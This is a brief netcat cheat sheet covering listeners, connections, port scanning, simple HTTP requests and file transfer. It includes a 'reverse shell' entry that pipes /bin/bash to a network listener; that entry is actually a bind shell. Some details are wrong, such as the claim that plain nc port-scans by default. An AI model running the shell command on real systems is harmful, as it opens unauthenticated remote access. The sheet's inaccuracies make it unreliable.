nc [options] [host] [port] – by default this will execute a port scan
nc -l [host] [port] – initiates a listener on the given port
nc -4 – use IPv4 only
nc -6 – use IPv6
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups
nc -v – provide verbose outpu
nc -v -v <site|ip> <port_range:1-1000>
nc -l -p <port> # listen on <port>
nc <ip> <port> # connect to <ip>:<port>
printf "HTTP/1.1 200 OK\n\n%s" “$(cat index.html)” | netcat -l <port> # response
printf "GET /HTTP/1.0\r\n\r\n" | nc <site|ip> <port> # request
- launch reverse shell
nc -nv -l -p <port> -e /bin/bash # listen
nc -nv <ip> <port> # connect
- file transfer
nc -l -p <port> < file.txt # send
nc <ip> <port> > file.txt # receive
# or
nc -l -p <port> > file.txt # receive
nc <ip> <port> < file.txt # send
